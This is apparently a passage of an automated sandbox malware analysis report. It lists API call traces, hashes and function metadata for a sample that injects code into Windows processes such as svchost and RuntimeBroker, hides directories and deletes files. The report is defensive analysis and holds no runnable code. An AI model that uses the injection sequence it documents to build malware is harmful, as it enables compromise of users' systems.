Instruction Fuzzy Hash: 25411DB2404214DFDB176BA08889FAA73ACEF54B00F4505ADBB85EF056DF309690CEA5

Function 001C06CE Relevance: 18.1, APIs: 12, Instructions: 97
sleepstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
Sleep.KERNEL32(00001388), ref: 001C070A
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
Sleep.KERNEL32(00001388), ref: 001C081D

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 7ea33d55d254b196ccdd85eefc5e787c536d3095197ddd6fe78dffc3f5513c5a
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: 6A31FDB2500214DFDB176BA08C89FAA73BCEF54B00F4504ADBB85EE055DF309690CEA5

Function 001C2666 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsA.KERNEL32(001C2656,00000010,?,?,00000000,00000104), ref: 001C266B
lstrcat.KERNEL32(00000000,001C26A3), ref: 001C26B0
lstrcat.KERNEL32(00000000,00000000), ref: 001C26C3

Strings

\AC\, xrefs: 001C2683

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: e4e2971d9f5b256a87e084e92f98be58b8673f9a9e46d99b317538ee14eb21d4
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 84218B71500218EFEF129F60CC89F9DBBB4EF20704F1441A9ED54EA1A1D730CA619B64

Function 001C0A1A Relevance: 12.1, APIs: 8, Instructions: 76
threadsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
ResumeThread.KERNEL32(?), ref: 001C0AF7
Sleep.KERNEL32(000003E8), ref: 001C0B07
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: 2067751bc769af6727e3ef1839da84b1b4ae6cc8dc197e2e45a006881c8fd9f5
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: 6E314F716402549FEF238F10CC85FA977B8EF18744F080198AA49FE0E6DB70DA90CE64

Function 001C0D29 Relevance: 12.1, APIs: 8, Instructions: 64sleepprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C0D48
Sleep.KERNEL32(000003E8), ref: 001C0D5E
Process32First.KERNEL32(?,00000000), ref: 001C0D7E
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001C0DB3
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001C0DC9
Process32Next.KERNEL32(?,?), ref: 001C0DDF
CloseHandle.KERNEL32(?), ref: 001C0E0B
Sleep.KERNEL32(000003E8), ref: 001C0E16

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
Instruction ID: 724837a767e616bbb3b298c250941228e268248473bfe5bfc93ac98464869d00
Opcode Fuzzy Hash: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
Instruction Fuzzy Hash: D1217F31911124EBEF225FA4CC54BEDB7B9AF48701F0901E9F90AEA195CB309E908F55

Function 001C2A88 Relevance: 7.6, APIs: 5, Instructions: 108filesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 001C2A60

Part of subcall function 001C2BBB: Sleep.KERNEL32(00002710), ref: 001C2C2C

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B02
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B46
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B9C
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2BB0

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: 275fb6263abb37eef3e3e71df306651d1210d5ae5ccfddcb04249f26a9e9dd2e
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: 5B310171500269AFEB266F71CC89FAB77BCAFB0704F44049DEA45DA051DF74DA80CAA1

Function 001C32C2 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction ID: c7485b42a56dfa788a16c5305a251ae6568656de49255e47a5d89b7acae85cb3
Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction Fuzzy Hash: 581103B2404554AFEF136B60CD85FAFB7FDEF60305F0544ADE585A6045DB349A80CEA1

Function 001C328F Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction ID: ac9927580557797ac402c103fd79d00d7d15eeabf0bd26a871240790a05aac25
Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction Fuzzy Hash: 7E111FB28045589FEF136B60CC89FAFB7F8EF60305F0144A9E985AA045DB349A80CE91

Function 001C0B42 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$ExitFindLibraryLoadOpenThread
String ID:
API String ID: 3976292551-0
Opcode ID: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
Instruction ID: 21096797c2136e07da87d67eb28ce3356d04a0ee0ec389f9400993a79b57079d
Opcode Fuzzy Hash: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
Instruction Fuzzy Hash: 6111E575944305ABEF026AB08C89FAA375C9F38704F0944AABD55EF096DB70DC41C7B5

Function 001C0B68 Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(001C0B61,00000007,?,00000000), ref: 001C0B6D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C0BA6: FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
Part of subcall function 001C0BA6: GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
Part of subcall function 001C0BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
Part of subcall function 001C0BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
String ID:
API String ID: 3081398214-0
Opcode ID: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
Instruction ID: aba8e1325fc70c5bdf08b0507d9e73b3b069cfc1834b77748dc634d74a94ba5d
Opcode Fuzzy Hash: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
Instruction Fuzzy Hash: 0A01D175A44305BBEF026A708C89FAE365CAF28700F0904A9BD55EE1D6DBB0CC41C6B4

Function 001C0BA6 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5

Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B

ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
String ID:
API String ID: 1790362231-0
Opcode ID: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
Instruction ID: 8d2a110fdadbfcb79557eef3c6f04e088fde0ec6edb1f3a929b01c2de3428793
Opcode Fuzzy Hash: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
Instruction Fuzzy Hash: 5F11C465649241AEEF1367708D55F6A3B695F36700F1941DDF8149E0A3DB60CC02D678

Function 001C26CD Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001C26E8
GetFileSize.KERNEL32(?,00000000), ref: 001C2701
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001C2722
CloseHandle.KERNEL32(?), ref: 001C2733

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: 1b7016d98d2ac921908da5a69b0d089c21a15c5119871dbff96ca870c68476b5
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: 9D01EC30640309BBEF119F60CC8AF9D7AB4AF20B44F1041A9EA14F91E0D770AA619A18

Function 001C2740 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001C275C
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001C2779
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001C2795
CloseHandle.KERNEL32(?), ref: 001C27A6

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: e83ab4e8bfacfcbb9057bf8691385a7719df8e694ba331f985fc6044b9c84708
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: E501E430640209FFEF119FA0DC86F8D7AB5AF14B14F2041A8BA14B91E5D771AA20AB54

Analysis Process: ApplicationFrameHost.exePID: 5400, Parent PID: 616COMMON

Executed Functions

Function 00931DA4 Relevance: 4.6, APIs: 3, Instructions: 123
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00931DE3
VirtualAlloc.KERNELBASE ref: 00931E1C
VirtualProtect.KERNELBASE ref: 00931EA0

Memory Dump Source

Source File: 00000014.00000002.3337609995.0000000000930000.00000040.00000001.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_930000_ApplicationFrameHost.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction ID: a240a72feaf5064264a11685636bb554f6b31fbebda5d82e7a0317d967be0bdc
Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction Fuzzy Hash: 64212030A34C1D0BEB68627C9855764F6D6E79C720F540355E91ED36E8DD58CC8187C6

Function 00930908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0093096B
RtlExitUserThread.NTDLL ref: 00930974

Memory Dump Source

Source File: 00000014.00000002.3337609995.0000000000930000.00000040.00000001.00020000.00000000.sdmp, Offset: 00930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_930000_ApplicationFrameHost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 50b9bfc1027b919213d53b7a227b831e8cd63d74d8fc691782eddb7c7225e531
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 68F082B2514604AFFB007BB08C99E7B369CEFC0301B440535FC56DA0AADD358C148D76

Analysis Process: RuntimeBroker.exePID: 2972, Parent PID: 616COMMON

Executed Functions

Function 00180908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0018096B
RtlExitUserThread.NTDLL ref: 00180974

Memory Dump Source

Source File: 00000016.00000002.3337343363.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_180000_RuntimeBroker.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 3149fd5e89a7fd841218b20de542f0134e908d8158aa4892dacf1614708359ca
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 58F09AB2810508BFFB42BBB08C8987B329CEF643117400525FC4ACA09ADE308E188A75

Analysis Process: svchost.exePID: 3696, Parent PID: 616COMMON

Executed Functions

Function 00670908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0067096B
RtlExitUserThread.NTDLL ref: 00670974

Memory Dump Source

Source File: 00000017.00000002.3337350000.0000000000670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_670000_svchost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: fdd017bc4f08c7afcf87e07b651297a8cf3bba78ed7c602faa8bb3c56c252014
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: A9F082B2524604EFFB40BBB48C89C7B369EEF40301744953AFC4EDA09AED348C148579

Analysis Process: TextInputHost.exePID: 6588, Parent PID: 616COMMON

Executed Functions

Function 009C0908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 009C096B
RtlExitUserThread.NTDLL ref: 009C0974

Memory Dump Source

Source File: 00000018.00000002.3337758796.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9c0000_TextInputHost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: ea4300f626250abceef8d595b12beb5c15196607849e50899eaeaaf3389043bb
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: E9F05EB2914604AFFB007BB48C89F7B769CEEC1301B840539FC46DA09BDD348D14857A

Analysis Process: conhost.exePID: 5996, Parent PID: 616COMMON

Executed Functions

Function 00F70908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00F7096B
RtlExitUserThread.NTDLL ref: 00F70974

Memory Dump Source

Source File: 00000019.00000002.3337644907.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_f70000_conhost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 6e2b851918056bc67e635c5c8ff4188357ff3b7750ec94a55f39c3998825fdec
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 9BF05EB2514604AFFB007BB48C89C7B36ACEE403117448636FC4ADA09AED389C189576

Analysis Process: RuntimeBroker.exePID: 4016, Parent PID: 616COMMON

Executed Functions

Function 00D50908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00D5096B
RtlExitUserThread.NTDLL ref: 00D50974

Memory Dump Source

Source File: 0000001B.00000002.2860829417.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d50000_RuntimeBroker.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: ccfdfb1484f8b8f3a83523ca8d191273b27f32bbc0e696f19697ceaba78b43e6
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 20F0FEB6514504AFFF017BB49C8A97B7AACEE403137480936FC46DA49AED349C1C8975

Analysis Process: TbOpfOXygan.exePID: 5672, Parent PID: 616COMMON

Executed Functions

Function 011A097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 0b8a859419bef3d617e63a7bfb3ae72199e12125d1515e20da476af334188d5a
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: D9419071640214AFFB169F60CC85FA97BBCEF08744F440195BB49FE0D5DB709690CA65

Function 011A1386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 4a1dbe4fef6b1207fb1fd5e790cae69e961932a45e3d76ff7f9915237b15b533
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: A7219D31904216AFEB12DF7CC848B9DBFB5AF04710F498225FA55AF2D0E770A810CB94

Function 011A1528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction ID: 17af5398828778133b9aff3e3ae56e32fede575e02356ce31e8cff23fe4cd0a9
Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction Fuzzy Hash: 9D11BF72404515AEDF03AF60C5C4CAA77ECEF50708F45096A9D85EF44DEF709154CAE5

Function 011A09A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: c590e6525871e28ec5bf1cc32fb7939177094b04d34cfb7168bb8c7da6878535
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: 93014471644318AFEB13DE50CC81FAA73FCEF44B08F500195BB49EE0C5EAB065808AD9

Function 011A3FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: 3ba900b75d22df0e2b23722d6fea15d6bf92e37754e8c227e1fe291e303c70ee
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: 8BF03778584281D7FB597BB08D49B8D3EA49F5170DF480090EA49BE896CFB85450AE72

Non-executed Functions

Function 011A47F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 011A492D
nt: , xrefs: 011A4939
ie: , xrefs: 011A48B1
-Age, xrefs: 011A4933
Cook, xrefs: 011A48AB

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 6ccf0727ed01401a626e49db61abb50f3800be2e0998b3d0e87ae7461e62c3ef
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
